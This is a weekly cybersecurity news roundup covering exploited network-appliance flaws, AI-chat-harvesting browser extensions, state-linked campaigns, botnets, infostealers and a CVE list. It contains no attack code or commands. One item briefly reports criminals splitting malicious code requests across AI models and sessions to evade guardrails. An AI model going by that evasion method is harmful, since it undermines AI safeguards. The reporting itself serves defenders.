Cyber threats last week showed how attackers no longer need big hacks to cause big damage. They’re going after the everyday tools we trust most — firewalls, browser add-ons, and even smart TVs — turning small cracks into serious breaches.
The real danger now isn’t just one major attack, but hundreds of quiet ones using the software and devices already inside our networks. Each trusted system can become an entry point if it’s left unpatched or overlooked.
Here’s a clear look at the week’s biggest risks, from exploited network flaws to new global campaigns and fast-moving vulnerabilities.
⚡ Threat of the Week
Flaws in Multiple Network Security Products Come Under Attack — Over the past week, Fortinet, SonicWall, Cisco, and WatchGuard said vulnerabilities in their products have been exploited by threat actors in real-world attacks. Cisco said attacks exploiting CVE-2025-20393, a critical flaw in AsyncOS, have been abused by a China-nexus advanced persistent threat (APT) actor codenamed UAT-9686 to deliver malware such as ReverseSSH (aka AquaTunnel), Chisel, AquaPurge, and AquaShell. The flaw remains unpatched. SonicWall said attacks exploiting CVE-2025-40602, a local privilege escalation flaw impacting Secure Mobile Access (SMA) 100 series appliances, have been observed in connection with CVE-2025-23006 (CVSS score 9.8) to achieve unauthenticated remote code execution with root privileges. The development comes as firewalls and edge appliances have become a favorite target for attackers, giving attackers deeper visibility into traffic, VPN connections, and downstream systems.
🔔 Top News
Featured Chrome Extension Caught Harvesting AI Chats — Urban VPN Proxy, a Google Chrome and Microsoft Edge extension, with more than 7.3 installations, was observed stealthily gathering every prompt entered by users into artificial intelligence (AI)-powered chatbots like OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta AI, and Perplexity. Three other extensions from the same developer, 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker, were also updated with similar functionality. Collectively, these add-ons were installed more than eight million times. The extensions are no longer available for download from the Chrome Web Store.
Ink Dragon Targets Governments with ShadowPad and FINALDRAFT — The threat actor known as Jewelbug (CL-STA-0049, Earth Alux, Ink Dragon, and REF7707) has been increasingly focusing on government targets in Europe since July 2025, even as it continues to attack entities located in Southeast Asia and South America. The campaign has “impacted several dozen victims, including government entities and telecommunications organizations, across Europe, Asia, and Africa.” Ink Dragon does not merely use victims for data theft but actively repurposes them to support ongoing operations against other targets of interest. This creates a self-sustaining infrastructure that obscures the true origin of the attacks while maximizing the utility of every compromised asset.
Kimwolf Botnet Hijacks 1.8 Million Android TVs — A new botnet named Kimwolf is powered by no less than 1.8 million Android TVs. Infections are scattered globally, with Brazil, India, the U.S., Argentina, South Africa, and the Philippines registering higher concentrations. Kimwolf is believed to share its origins with AISURU, which has been behind some of the record-breaking DDoS attacks over the past year. It’s suspected that the attackers reused code from AISURU in the early stages, before opting to develop the Kimwolf botnet to evade detection. QiAnXin XLab said it’s possible some of these attacks may not have come from AISURU alone, and that Kimwolf may be either participating or even leading the efforts.
LongNosedGoblin Uses Group Policy For Malware Deployment — A previously undocumented China-aligned threat cluster dubbed LongNosedGoblin has been attributed to a series of cyber attacks targeting governmental entities in Southeast Asia and Japan. Central to the group’s tradecraft is the abuse of Group Policy to deploy malware across the compromised network and cloud services for communication with infected endpoints using a backdoor dubbed NosyDoor. The threat actor is believed to be active since at least September 2023. The exact initial access methods used in the attacks are presently unknown.
Kimsuky Uses DocSwap Android Malware — The North Korean threat actor known as Kimsuky has been linked to a new campaign that distributes a new variant of Android data gathering malware called DocSwap via QR codes hosted on phishing sites mimicking Seoul-based logistics firm CJ Logistics (formerly CJ Korea Express). The apps masquerade as package delivery service apps. It’s believed that the threat actors are using smishing texts or phishing emails impersonating delivery companies to deceive recipients into clicking on booby-trapped URLs hosting the apps. A noteworthy aspect of the attack is its QR code-based mobile redirection, which prompts users visiting the URLs from a desktop computer to scan a QR code displayed on the page on their Android device to install the supposed shipment tracking app and look up the status.
️🔥 Trending CVEs
Hackers act fast. They can use new bugs within hours. One missed update can cause a big breach. Here are this week’s most serious security flaws. Check them, fix what matters first, and stay protected.
This week’s list includes — CVE-2025-14733 (WatchGuard), CVE-2025-11901, CVE-2025-14302, CVE-2025-14303, CVE-2025-14304 (pre-boot DMA protection Bypass), CVE-2025-37164 (HPE OneView Software), CVE-2025-59374 (ASUS Live Update), CVE-2025-20393 (Cisco AsyncOS), CVE-2025-40602 (SonicWall SMA 100 Series), CVE-2025-66430 (Plesk), CVE-2025-33213 (NVIDIA Merlin Transformers4Rec for Linux), CVE-2025-33214 (NVIDIA NVTabular for Linux), CVE-2025-54947 (Apache StreamPark), CVE-2025-13780 (pgAdmin), CVE-2025-34352 (JumpCloud Agent), CVE-2025-14265 (ConnectWise ScreenConnect), CVE-2025-40806, CVE-2025-40807 (Siemens Gridscale X Prepay), CVE-2025-32210 (NVIDIA Isaac Lab), CVE-2025-64374 (Motors WordPress theme), CVE-2025-64669 (Microsoft Windows Admin Center), CVE-2025-46295 (Apache Commons Text), CVE-2025-68154 (systeminformation), CVE-2025-14558 (FreeBSD), and cross-site scripting and information disclosure flaws in Roundcube Webmail (no CVEs).
📰 Around the Cyber World
FBI Warns of Campaigns Impersonating Government Officials — The U.S. Federal Bureau of Investigation (FBI) has warned that malicious actors have impersonated senior U.S. state government, White House, and Cabinet-level officials, as well as members of Congress, to target individuals, including officials’ family members and personal acquaintances, since at least 2023. The “Malicious actors have sent text messages and AI-generated voice messages — techniques known as smishing and vishing, respectively — that claim to come from a senior U.S. official to establish rapport with targeted individuals,” the FBI said. “In the scheme, actors contact an individual and briefly engage on a topic the victim is versed on, with a request to move communication to a secondary, encrypted mobile messaging application, happening almost immediately.” Once the conversation has shifted to Signal or WhatsApp, the threat actors urge victims to provide an authentication code that allows the actors to sync their device with the victim’s contact list, share Personally Identifiable Information (PII) and copies of sensitive personal documents, wire funds to an overseas financial institution under false pretenses, and request them to introduce the actor to a known associate.
Noyb Files Complaint Against TikTok, AppsFlyer and Grindr — Austrian privacy non-profit noyb has filed complaints against TikTok, AppsFlyer, and Grindr, accusing the popular video sharing platform of unlawfully tracking users across apps in violation of GDPR laws in the region. “A user found out about this unlawful tracking practice through an access request — which showed that, e.g. his usage of Grindr was sent to TikTok, likely via the Israeli tracking company AppsFlyer — which allows TikTok to draw conclusions about his sexual orientation and sex life,” noyb said. “TikTok initially even withheld this information from the user, which violates Article 15 GDPR. Only after repeated inquiries, TikTok revealed that it knows which apps he used, what he did within these apps (for example, adding a product to the shopping cart) – and that this data also included information about his usage of the gay dating app Grindr.”
AuraStealer Spotted in the Wild — An emerging malware-as-a-service (MaaS) information stealer called AuraStealer has been distributed via Scam-Yourself campaigns, where victims are lured by TikTok videos disguised as product activation guides. “Viewers are instructed to manually retype and run a displayed command in an administrative PowerShell, which, however, instead of activating the software, quietly downloads and executes the malicious payload,” Gen Digital said. “Apart from TikTok Scam-Yourself campaigns, AuraStealer is also distributed through supposedly cracked games or software, with delivery chains of varying complexity.” AuraStealer makes use of a long list of anti-analysis and obfuscation techniques, including indirect control flow obfuscation, string encryption, and exception-driven API hashing, to resist attempts to reverse engineer the malware. It’s capable of harvesting data from Chromium- and Gecko-based browsers, cryptocurrency wallets from desktop applications and browser extensions, clipboard contents, session tokens, credentials, VPNs, password managers, screenshots, and detailed system metadata. Also detected in the wild are two other information stealers named Stealka and Phantom, with the latter distributed via fake Adobe installers.
Blind Eagle Continues to Attack Colombia — Colombian institutions have continued to face attacks from a threat actor known as Blind Eagle. The latest phishing attacks, targeting agencies under the Ministry of Commerce, Industry and Tourism (MCIT), have shifted to a more sophisticated, multi-layer flow that uses an off-the-shelf loader named Caminho to deliver DCRat. The messages are sent from compromised email accounts within the same organization to bypass security checks. “The phishing email used a legal-themed design to lure the recipient,” Zscaler said. “The email was created to appear as an official message from the Colombian judicial system, referencing a labor lawsuit with an authentic-sounding case number and date. The email pressures the recipient to confirm receipt immediately, leveraging authority, fear of legal consequences, and confidentiality warnings to trick the recipient into taking an action, namely opening the attachment.”
Scripted Sparrow Linked to Large-Scale BEC Attacks — A sprawling Business Email Compromise (BEC) collective known as Scripted Sparrow has been observed distributing more than three million email messages each month and refining its social-engineering playbook. “The scale of the group’s operation strongly suggests the use of automation to generate and send their attack messages,” Fortra said. “The group utilizes a combination of free webmail addresses as well as addresses on domains they’ve registered specifically for their operations. The group operates by posing as various executive coaching and leadership training consultancies.” The group is estimated to have registered 119 domains and used 245 webmail addresses. It has also used 256 bank accounts to move money out of victims’ bank accounts.
Smart Devices Run Outdated Browser Versions — An academic study by a team of Belgian researchers has found that a majority of smart devices, such as smart TVs, e-readers, and gaming consoles, come with an embedded web browser that runs extremely outdated versions, sometimes as much as three years. All five e-readers that were tested, and 24 of 35 smart TV models, used embedded browsers that were at least three years behind current versions available to users of desktop computers. These outdated, embedded browsers can leave users open to phishing and other security vulnerabilities. The authors said some of the issues lie in how development frameworks like Electron bundle browsers with other components. “We suspect that, for some products, this issue stems from the user-facing embedded browser being integrated with other UI components, making updates challenging – especially when bundled in frameworks like Electron, where updating the browser requires updating the entire framework,” they said in the paper. “This can break dependencies and increase development costs.”
Denmark Blames Russia For Attack on Water Utility — The Danish Defence Intelligence Service (DDIS) has blamed Russia for recent destructive and disruptive cyber attacks against the country, including a water utility in 2024, as well as distributed denial-of-service (DDoS) attacks on Danish websites in the run-up to the 2025 municipal and regional council elections. The attacks have been attributed to pro-Russian hacktivist groups Z-Pentest and NoName057(16), respectively. “The Russian state uses both groups as instruments of its hybrid war against the West. The aim is to create insecurity in the targeted countries and to punish those who support Ukraine,” the DDIS said. “Russia’s cyber operations form part of a broader influence campaign intended to undermine Western support for Ukraine.” The statement comes a few days after a global cybersecurity advisory warned that pro-Russian hacktivist groups conduct opportunistic attacks against US and global critical infrastructure.
Russia Targeted by Arcane Werewolf — Russian manufacturing companies have become the target of a threat actor known as Arcane Werewolf (aka Mythic Likho). Campaigns undertaken by the hacking group in October and November 2025 likely leveraged phishing emails as the initial access vector that presumably contained links to a malicious archive hosted on the attackers’ server. The links directed victims to a spoofed website imitating a Russian manufacturing company. The end goal of the attacks is to deploy a custom implant named Loki 2.1 by means of a loader that’s delivered using a Go-based dropper downloaded from an external server using PowerShell code embedded into a Windows shortcut (LNK) contained in the ZIP file. In an attack chain detected in November 2025, a new C++ dropper was used to propagate the malware. Loki 2.1 is equipped to upload/download files, inject code into a target process, terminate arbitrary processes, retrieve environment variables, and stop its own execution.
RansomHouse Upgrades to Complex Encryption — The RansomHouse (aka Jolly Scorpius) ransomware group has upgraded its file encryption process to use two different encryption keys to encrypt files as part of their attacks in what has been described as a significant escalation and “concerning trajectory” in ransomware development. “The upgraded version’s code reveals a two-factor encryption scheme where the file is encrypted with both a primary key and a secondary key. Data encryption is processed separately for each key,” Palo Alto Networks Unit 42 said. “This significantly increases the difficulty of decrypting the data without both keys.” The e-crime group has been active since December 2021, listing 123 victims on its data leak site. Central to the threat actor’s operations is a tool called MrAgent that provides attackers with persistent access to a victim’s environment and simplifies managing compromised hosts at scale. It’s also responsible for deploying Mario to encrypt critical VM files in the ESXi hypervisor.
LLMs and Ransomware Lifecycle — The emergence of large language models (LLMs) is likely accelerating the ransomware lifecycle, according to new findings from SentinelOne. “We observe measurable gains in speed, volume, and multilingual reach across reconnaissance, phishing, tooling assistance, data triage, and negotiation, but no step-change in novel tactics or techniques driven purely by AI at scale,” the company said. LLMs, including those that are deployed locally, can be used to replace the manual effort associated with drafting phishing emails and localized content, search for sensitive data, and develop malicious code. The continued sightings of various dark LLMs show that criminals are gravitating toward uncensored models that allow them to evade guardrails. “Actors already chunk malicious code into benign prompts across multiple models or sessions, then assemble offline to dodge guardrails,” SentinelOne said. “This workflow will become commoditized as tutorials and tooling proliferate, ultimately maturing into ‘prompt smuggling as a service.'” The findings signal that the barrier to entry into cybercrime continues to drop, even as the ransomware ecosystem is splintering and the line between nation-state and crimeware activity is increasingly blurring. The use of the technology is also likely to blur existing assessment lines around tradecraft and attribution, owing to the fact that the capabilities even allow smaller groups to acquire capabilities that were once limited to advanced state-backed actors.
TikTok Signs Agreement to Create New U.S. Joint Venture — Nearly a year after TikTok’s operations were briefly banned in the U.S. for national security concerns, the popular video-sharing platform said it has finalized a deal to move a substantial portion of its U.S. business under a new joint venture named TikTok USDS Joint Venture LLC. According to reports from Axios, Bloomberg, CNBC, and The Hollywood Reporter, the company has signed agreements with the three managing investors: Oracle, Silver Lake, and Abu Dhabi-based MGX. Together, those companies will own 45% of the U.S. operation, while ByteDance retains a nearly 20% share. The new entity is said to be responsible for protecting U.S. data, ensuring the security of its prized algorithm, content moderation, and “software assurance.” Oracle will be the trusted security partner in charge of auditing and validating compliance. The agreement is set to go into effect on January 22, 2026. Under a national security law, China-based ByteDance was required to divest TikTok’s U.S. operations or face an effective ban in the country. The U.S. government has since extended the ban four times as a deal was being hatched behind the scenes. Under President Donald Trump’s executive order in September, the attorney general was blocked from enforcing the national security law for a 120-day period in order to “permit the contemplated divestiture to be completed,” allowing the deal to finalize by January 23, 2026.
Android Adware Campaign Targets East and Southeast Asia — Android users in the Philippines, Pakistan, and Malaysia have been targeted by a large-scale Android adware campaign dubbed GhostAd that silently drains resources and disrupts normal phone use through persistent background activity. The set of 15 apps, distributed via Google Play, masqueraded as harmless utility and emoji-editing tools such as Vivid Clean and GenMoji Studio. “Behind their cheerful icons, these apps created a persistent background advertising engine – one that kept running even after users closed or rebooted their devices, quietly consuming battery and mobile data,” Check Point said. “GhostAd integrates multiple legitimate advertising software development kits (SDKs), including Pangle, Vungle, MBridge, AppLovin, and BIGO, but uses them in a way that violates fair-use policies. Instead of waiting for user interaction, the apps continuously load, queue, and refresh ads in the background, using Kotlin coroutines to sustain the cycle.” The apps have since been removed by Google, but not before they amassed millions of downloads.
Texas Sues TV Makers for Spying on Owners — Texas Attorney General Ken Paxton accused Sony, Samsung, LG, Hisense, and TCL of spying on their customers and illegally collecting their data by using automatic content recognition (ACR), according to a new lawsuit. “ACR in its simplest terms is an uninvited, invisible digital invader,” Paxton said. “This software can capture screenshots of a user’s television display every 500 milliseconds, monitor viewing activity in real time, and transmit that information back to the company without the user’s knowledge or consent. This conduct is invasive, deceptive, and unlawful.”
Cybercriminals Entice Insiders with High Payouts — Check Point has called attention to dark web posts that aim to recruit insiders within organizations to gain access to corporate networks, user devices, and cloud environments. The activity targets the financial sector and cryptocurrency firms, as well as companies like Accenture, Genpact, Netflix, and Spotify. The ads offer payouts from $3,000 to $15,000 for access or data. “Across darknet forums, employees are being approached, or even volunteering, to sell access or sensitive information for lucrative rewards,” the company said. When internal staff disable defenses, leak credentials, or provide privileged information, preventing an attack becomes exponentially harder. Monitoring the deep web and darknet for organizational mentions or stolen data is now as critical as deploying advanced cyber prevention technologies.”
Flaws in Anno 1404 Game — Synacktiv researchers have disclosed multiple vulnerabilities in a strategy game named Anno 1404 that, if chained together, allow for arbitrary code execution from within the multiplayer mode.
JSCEAL Campaign Undergoes a Shift — A Facebook ads campaign that’s used to distribute a compiled V8 JavaScript (JSC) malware called JSCEAL has evolved into a more sophisticated form, with the attackers adopting a revamped command-and-control (C2) infrastructure, enhanced anti-analysis safeguards, and an updated script engine designed for increased stealth. “In contrast to the 1H 2025 campaign, which relied primarily on .com domains, the August 2025 campaign includes a broader variety of top-level domains such as .org, .link, .net, and others,” Cato Networks said. “These domains are registered in bulk at regular intervals, suggesting an automated, scalable provisioning workflow.” What’s more, the updated infrastructure enforces stricter filtering and anti-analysis controls, blocking any HTTP request that does not present a PowerShell User-Agent. In the event a request includes the correct PowerShell User-Agent, the server responds with a fake PDF error rather than delivering the actual payload. It’s only after the PDF has been returned that the C2 server delivers the next stage, including a modified version of the ZIP file containing the stealer malware.
Third Defendant Pleads Guilty to Hacking Fantasy Sports and Betting Website — Nathan Austad, 21, of Farmington, Minnesota, has pleaded guilty in connection with a scheme to hack thousands of user accounts at an unnamed fantasy sports and betting website and sell access to those accounts with the goal of stealing hundreds of thousands of dollars from users. Austad and others launched a credential stuffing attack on the website in November 2022 and fully compromised approximately 60,000 user accounts. “In some instances, Austad and his co-conspirators were able to add a new payment method of their own on the account (i.e., to a newly added financial account belonging to the hacker) and then use it to withdraw all the existing funds in the victim account to themselves, thus stealing the funds in each affected Victim Account,” the U.S. Justice Department said. “Using this method, Austad and others stole approximately $600,000 from approximately 1,600 victim accounts on the Betting Website.” Access to the victim accounts was then sold on various websites that traffic in stolen accounts.
Drop in Critical CVEs in 2025 — The number of critical vulnerabilities flagged in 2025 is at 3,753, down from 4,629 in 2023 and 4,283 in 2024, even as the total number of CVEs has increased to more than 40,000. According to VulnCheck, about 25.9% of the 43,002 CVEs published in 2025 have been enriched with a CVSS v4 score. “What this ultimately suggests is that CVSS v4 adoption is constrained not by lack of availability, but by limited participation from some of the largest and most influential CVE publishers and enrichers,” it said. “Commonly cited reasons include resource constraints, required tooling changes, and a perception that CVSS v4 provides limited additional value while increasing scoring complexity and operational overhead.”
Amadey Uses Self-Hosted GitLab Instance to Distribute StealC — A new Amadey malware loader campaign has leveraged an exploited self-hosted GitLab instance (“gitlab.bzctoons[.]net”) to deliver the StealC infostealer. “This analysis reveals how threat actors are hijacking abandoned, self-hosted GitLab servers to create a legitimate-looking payload distribution infrastructure,” Trellix said. “The use of a long-standing domain with valid TLS certificates provides an effective evasion technique against traditional security controls.” While the domain appears to belong to a small-scale organization hosting GitLab with multiple users, evidence suggests that either the user account or the entire infrastructure has been compromised.
U.S. Dismantle E-Note Cryptocurrency Exchange — U.S. authorities seized the servers and infrastructure of the E-Note cryptocurrency exchange (“e-note.com,” “e-note.ws,” and “jabb.mn”) for allegedly laundering more than $70 million from ransomware attacks and account takeover attacks since 2017. No arrests have been announced. In tandem, authorities have also indicted the site’s operator, a 39-year-old Russian national named Mykhalio Petrovich Chudnovets, who is said to have started offering money laundering services to cybercriminals in 2010. Chudnovets has been charged with one count of conspiracy to launder monetary instruments, which carries a maximum penalty of 20 years in prison. The takedown fits into a broader law enforcement effort aimed at taking down services that allow bad actors to abuse the financial system and cash out the ill-gotten proceeds.
🎥 Cybersecurity Webinars
How Zero Trust and AI Catch Attacks With No Files, No Binaries, and No Indicators — Cyber threats are evolving faster than ever, exploiting trusted tools and fileless techniques that evade traditional defenses. This webinar reveals how Zero Trust and AI-driven protection can uncover unseen attacks, secure developer environments, and redefine proactive cloud security—so you can stay ahead of attackers, not just react to them.
Master Agentic AI Security: Learn to Detect, Audit, and Contain Rogue MCP Servers — AI tools like Copilot and Claude Code help developers move fast, but they can also create big security risks if not managed carefully. Many teams don’t know which AI servers (MCPs) are running, who built them, or what access they have. Some have already been hacked, turning trusted tools into backdoors. This webinar shows how to find hidden AI risks, stop shadow API key problems, and take control before your AI systems create a breach.
🔧 Cybersecurity Tools
Tracecat — It is an open-source automation platform designed for security and IT teams that need flexible, scalable workflow orchestration. It combines simple YAML-based integration templates with a no-code interface for building workflows, along with built-in lookup tables and case management. Under the hood, workflows are orchestrated using Temporal to support reliability and scale, making Tracecat suitable for both local experimentation and production environments.
Metis — It is an open-source, AI-powered security code review tool built by Arm’s Product Security Team. It uses large language models to understand code context and logic, helping engineers find subtle security issues that traditional tools often miss. Metis supports multiple languages through plugins, works with different LLM providers, and is designed to reduce review fatigue in large or complex codebases while improving secure coding practices.
Disclaimer: These tools are for learning and research only. They haven’t been fully tested for security. If used the wrong way, they could cause harm. Check the code first, test only in safe places, and follow all rules and laws.
Conclusion
The past week made one point clear: the perimeter is gone, but accountability isn’t. Every device, app, and cloud service now plays a part in defense. Patching fast, verifying what’s running, and questioning defaults are no longer maintenance tasks — they’re survival skills.
As threats grow more adaptive, resilience comes from awareness and speed, not fear. Keep visibility high, treat every update as risk reduction, and remember that most breaches start with something ordinary left unchecked.
Source link
